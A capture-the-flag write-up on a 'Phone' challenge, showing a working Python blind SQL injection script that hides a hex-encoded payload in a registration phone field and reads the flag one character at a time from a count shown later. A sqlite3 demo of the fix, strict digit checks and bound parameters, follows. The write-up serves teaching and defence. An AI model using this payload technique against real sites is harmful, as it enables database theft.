After registering, you can click a button to see whose phone number is similar to yours.
When registering, there are three required fields: username, password and phone number. The phone number must be numeric.
After registering with the phone number 1111 and clicking View, the page reports that 1 person has a phone number similar to mine; after registering a second account with 1111, it reports that 2 people have a similar phone number. This shows that the database is queried and that only a number is returned.
The approach is blind injection: when registering, fill in the phone field with the payload written as a hexadecimal value.
The Python script is as follows:

    # coding=utf-8
    import binascii
    import re

    import requests


    def login_sqli(url, username, password, payload):
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0'
        }
        # login: registration form data, with the hex-encoded payload in the phone field
        data = {'username': username, 'password': password, 'phone': payload, 'register': 'Login'}
        try:
            # get session
            s = requests.session()
            s.headers.update(headers)
            req1 = s.get(url + '/index.php')
            # register
            req2 = s.post(url + '/register.php', data=data)
            # sqli: the stored phone value is used by the "similar phone" query
            req3 = s.get(url + '/query.php')
            return req3.text
        except requests.RequestException:
            print('Error')
            return ''


    if __name__ == '__main__':
        login_url = 'http://6705466128f243d0aff0aba9deb7317439a2f08c6e9c4760.game.ichunqiu.com'
        password = '123123'
        # The first run of digits in the response is the "similar phones" count
        pattern = re.compile(r'\d?\d?\d?\d?\d?\d')
        for i in range(1, 43):          # character position in the flag
            for j in range(33, 128):    # candidate printable ASCII code
                payload = "5555%%' and ord(mid((select * from flag),%d,1))=%d #" % (i, j)
                payload_0x = binascii.b2a_hex(payload.encode()).decode()
                _payload = '0x' + payload_0x
                # Each attempt registers a fresh account
                username = 'Userrif' + str(i) + str(j)
                text = login_sqli(login_url, username, password, _payload)
                # time.sleep(3)
                r = re.search(pattern, text)
                if r and int(r.group()) > 0:
                    print(str(i) + ' -' + chr(j))
                else:
                    continue

Results:
NET Tripod Cup challenge "Phone": hexadecimal MySQL injection
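
The defensive side of the flaw this write-up relies on, as an added example that is not part of the original write-up or the challenge's code: a loose numeric check lets a 0x-prefixed value through, and the stored value later changes a query built by string concatenation, while a strict digit check and a bound parameter both stop it. Assumptions: sqlite3 stands in for MySQL, the table, column and function names are hypothetical, the server-side check and storage behaviour are guessed from the write-up, and the sample input is constructed.

```python
import re
import sqlite3

# Constructed sample input: "0x" + hex of a string that contains a quote,
# the same encoding the write-up's script applies to the phone field.
HEX_PHONE = "0x" + "1111' OR '1'='1".encode().hex()

def loose_is_numeric(value):
    # Assumed weak server check: decimal digits or a 0x-prefixed hex literal.
    return re.fullmatch(r"[0-9]+|0[xX][0-9a-fA-F]+", value) is not None

def strict_is_phone(value):
    # Hardened check: ASCII decimal digits only, bounded length.
    return re.fullmatch(r"[0-9]{3,15}", value) is not None

def stored_value(value):
    # Emulates MySQL turning an unquoted 0x literal into a string on INSERT
    # (assumption about how the challenge stores the field).
    if value[:2].lower() == "0x":
        return bytes.fromhex(value[2:]).decode("latin-1")
    return value

def make_db(phones):
    # sqlite3 stands in for MySQL; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, phone TEXT)")
    rows = [("u%d" % i, p) for i, p in enumerate(phones)]
    db.executemany("INSERT INTO users VALUES (?, ?)", rows)
    return db

def count_similar_vulnerable(db, phone):
    # Second-order flaw: a value read back from storage is concatenated into SQL.
    sql = "SELECT COUNT(*) FROM users WHERE phone = '" + phone + "'"
    return db.execute(sql).fetchone()[0]

def count_similar_safe(db, phone):
    # Bound parameter: the stored value is treated as data, never as SQL.
    sql = "SELECT COUNT(*) FROM users WHERE phone = ?"
    return db.execute(sql, (phone,)).fetchone()[0]

if __name__ == "__main__":
    stored = stored_value(HEX_PHONE)
    db = make_db(["1111", "2222", stored])
    print(loose_is_numeric(HEX_PHONE), strict_is_phone(HEX_PHONE))
    print(count_similar_vulnerable(db, stored), count_similar_safe(db, stored))
```

Either control alone breaks the chain, but the bound parameter is the one that holds even if some other input path writes untrusted data into the phone column.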